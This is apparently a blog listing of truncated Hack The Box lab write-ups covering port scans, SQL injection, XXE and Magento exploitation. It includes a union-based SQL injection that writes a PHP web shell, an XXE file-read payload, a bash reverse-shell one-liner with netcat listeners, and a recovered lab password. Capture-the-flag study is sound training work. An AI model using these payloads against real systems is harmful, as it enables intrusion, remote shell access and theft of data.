HTB GoodGames

$ nmap -sV -p- goodgames.htb --min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ', we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don't have credentials for this site, but as we've confirmed there is an SQL injection let's try to exploit it. First, we need to know how many columns exist. ' union all

HTB Swagshop

$ nmap -p- -sV $ sudo nano /etc/hosts Access to http://swagshop.htb/ As we are facing a Magento, we can use Magescan to check it. $ wget $ php magescan.phar scan:all http://swagshop.htb In the patches section of the magescan report, the first one is SUPEE-5344. With this PoC, you should be able to add an admin user. $ python3 swagshop.htb Access to http://swagshop.htb/index.php/admin The "Froghopper" Attack After

HTB Return

$ nmap -sV -p- -Pn --min-rate 5000 If we add our IP into the Server Address field: $ sudo nc -lvnp 389 We get a connection and the svc-printer password. svc-printer:1edFg43012!! You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

HTB Validation

$ nmap -p- -v Access to The listbox values are sent to the server in a POST request: username=rffuste&country=Brazil In the response, we get a cookie user This user cookie does not change if multiple requests are performed. SQL Injection We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use. ' union select "" INTO OUTFILE '/var/www/html/shell.php'-- - Now

HTB TheNotebook

$ nmap -A -p- -T4 -v So, a user test exists. What would be the password? test??? Do we have an admin user? We can try to log in with our test user. Test notes After logging in, we can observe that there is an AUTH Token. We observe that it is a JWT Token. We can decode it using  Here we can observe several things: RS256

HTB BountyHunter

$ nmap -A -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) As we can observe in Burp, data is URL+base64 encoded. It's XML data, so we could try an XXE. Using Cyberchef ( on we also find: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file_to_use"> ]> We can use to check other files

HTB Love

$ nmap -A -p- -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap $ nmap -p- -v $ whatweb $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/ $ python3 $ id Using this exploit we get a reverse shell, but it is not very useful, so we can try to get a better one. $ python3 -u -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'" $ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /home james@knife:/home$ ls james@knife:/home$


$ nmap -A -p- -T4 -Pn Open ports: 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Dashboard Security Snapshot IP Config Network status Security Snapshot Using Burp we can discover the content of the site and find out if there is anything else in the content data. Using the Burp Discover functionality we can also find out if

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds. We can use it to perform a full port scan and then use the results in combination with Nmap. $ rustscan -a $ sudo nmap -sV -sC -p 2222,42135,42507,59777 In the port scan, we found different open ports. As usual, the SSH port is not a common port to start testing with, so